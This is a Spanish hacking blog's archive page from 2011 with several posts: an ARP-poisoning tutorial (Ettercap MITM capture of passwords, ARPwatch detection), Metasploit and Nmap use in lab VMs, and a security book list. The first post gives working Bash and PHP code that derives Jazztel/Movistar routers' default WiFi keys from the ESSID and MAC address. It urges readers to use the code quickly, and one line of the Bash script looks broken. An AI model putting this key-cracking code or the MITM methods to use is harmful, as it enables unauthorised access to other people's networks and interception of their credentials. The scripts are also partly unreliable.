Archivo

Archive for the ‘hackear’ Category

Routers WIFI al descubierto

09/02/2011 4 comentarios

Los usuarios de jazztel y movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (entre otros mas que alojan los algoritmos) se ingresa nombre y la MAC del router y te la clava.

Algunos ejemplos:

En BASH:

#!/bin/bash                                                                     

echo CalcWLAN by a.s.r                                                          

if [ $# -ne 2 ]
then
        echo "Usage: $0 <ESSID> <BSSID>"
        echo
        echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
        exit 1
fi                                                                              

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  

echo "La puta clave es $KEY"

En PHP:

// THIS CODE IS UNDER THE PUBLIC DOMAIN

function right($string, $chars)
{
	return substr($string, strlen($string) - $chars, $chars);
}

if (isset($_POST['essid']) && isset($_POST['bssid']))
{
	$bssid = preg_replace('/:/', '', strtoupper(trim($_POST['bssid'])));

	if (strlen($bssid) != 12)
	{
		die('Mete bien la MAC, buen hombre.');
	}

	$essid = strtoupper(trim($_POST['essid']));
	$_ssid = substr($bssid, 0, 8).right($essid, 4);

	die(substr(md5('bcgbghgg'.$_ssid.$bssid), 0, 20));
}

Daos prisa antes de que cierren las webs donde se alojan los fuentes.

Libros de recomendada lectura…

06/02/2011 5 comentarios

Estos libros que dejo para descarga espero me sean muy útiles en el curso de Seguridad que estoy recibiendo y de paso os los dejo a vosotros para su lectura recomendada…

  1. Seguridad física…algo tan importante en una empresa como lo sería la seguridad informática del software.
  2. Documentación sobre iptables-firewall de Linux. Importante a la hora de protegeros en cualquier sistema Linux hoy en dia.
  3. Guía de Seguridad del Administrador de Linux, traducido y muy recomendable para cualquier administrador de sistemas y seguridad en Linux.
  4. Introducción al SSH versión 0.2, tema muy importante, sobre todo en seguridad.
  5. Análisis de seguridad de la familia de protocolos TCP/IP y sus servicios asociados, algo sobre Hacking, pero sobre todo como protegernos de ese protocolo y su familia.

Un saludo. Mike Mars.

 

 

Envenenamiento ARP (Conclusión – VI)


Conclusión

Hemos visto cómo un ataque tan peligroso puede ser llevado a cabo con significativa facilidad haciendo uso de una herramienta que está a disposición de todo el mundo.Si cualquier aficionado es capaz de logar escuchas protegidas y privadas, ¿qué no podrá hacer un experto en redes?. Muchos son los administradores de redes que adjudican tiempo y dinero a soluciones a nivel de red como pueden ser firewalls, firewalls­bridge, sistemas de detección y prevención de intrusiones (IDS, IPS respectivamente), etc… pero que son inútiles en este tipo de ataques, en donde el nivel más básico y bajo el cual se sustentan todos los demás niveles queda desprotegido ante cualquier aficionado. Así que no deje descuidada la red si desea mantener la privacidad de sus datos. En caso de pertenecer a una red en donde usted contemple que la seguridad queda en entredicho, no dude consultar al administrador y hacerle saber el problema. Por lo demás, tomemos siempre precauciones, es mejor ser desconfiado.

Mike Mars

Bibliografía

http://www.google.com

http://es.wikipedia.org

http://www.monografias.com

http://www.rfc­editor.org/rfc/rfc826.txt

http://bulma.net/body.phtml?nIdNoticia=1193

http://www.secudos.de

http://ettercap.sourceforge.net

http://ditec.um.es/laso/docs/tut­tcpip/3376c28.html#figethfram

http://www.robota.net

http://www.irongeek.com

http://www.maestrosdelweb.com/editorial/sniffers/

http://www.xombra.com/go_articulo.php?articulo=47

Tutorial V

Tutorial IV

Tutorial III

Tutorial II

Tutorial I

Envenenamiento ARP (Soluciones – V)

02/02/2011 2 comentarios

Soluciones

5.1 ARPwatch

En sistemas Linux la herramienta ARPWatch ( http://www­nrg.ee.lbl.gov/) nos puede servir para detectar el uso del envenenamiento ARP en nuestro sistema. Con ARPWatch podemos comprobar la correspondencia entre pares IP­MAC (Ethernet). En caso de que un cambio en un par se produzca (esto es, se escuche en el interfaz de red del sistema), ARPWatch envía un correo de notificación del suceso a la cuenta root o administrador del sistema con un mensaje tipo “FLIP FLOP o Change ethernet address” . También podemos monitorizar la existencia de nuevos host (aparición de una nueva MAC en la red).

Leer más…

Envenenamiento ARP (Ettercap – IV)

02/02/2011 5 comentarios

Ettercap

Una de las herramientas más potentes que hacen uso del envenenamiento ARP en entornos GNU/Linux es Ettercap (http://ettercap.sourceforge.net). Ésta es una herramienta con licencia GPL diseñada con el fin de analizar , filtrar, logear y escuchar determinado tráfico circulando por la red. Soporta disección activa y pasiva de muchos protocolos (incluso los cifrados). Es capaz de realizar ataques MITM (Man in the Middle) entre diferentes hosts de la red , con el fin de entrometerse en su comunicación y obtener información valiosa tipo contraseñas POP, SSH, Telnet, FTP, Https, etc…

Decir que la mayoría de los sistemas operativos (excepto linux 2.4 y solaris 8) no implementan estados en el protocolo arp (aceptan arp­ replys sin haber enviado antes un request), por lo que facilmente aceptan respuestas ARP y en consecuencia modifican su tabla ARP en caché con cada arp­reply recibido.

Leer más…

Metasploit: Uso en Linux y Windows (Parte II)

01/02/2011 6 comentarios

Después del primer post sobre el Metasploit donde os enseñaba a instalarlo tanto para Linux como Windows, ahora os dejo después de usar el Nmap para descubrir las posibles vulnerabilidades del Windows 2003 y Windows XP SP3 (usados en mis pruebas, bajo VirtualBox) como se usa para explotar esa vulnerabilidad en ambos sistemas…espero que os sirva.

En cuanto descubra nuevas posibilidades os dejaré mas vídeos….un saludo a todos:)

Descubre vulnerabilidades con Nmap en Linux / Windows

01/02/2011 2 comentarios

Como os prometí en algún comentario anterior, para mostraros el uso del conocido Metasploit, debemos antes descubrir las posibles vulnerabilidades de nuestra victima (de su sistema operativo).

Para ello usaremos el Nmap para Linux / Windows.

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.
Leer más…

Etiquetas: , , ,
A %d blogueros les gusta esto: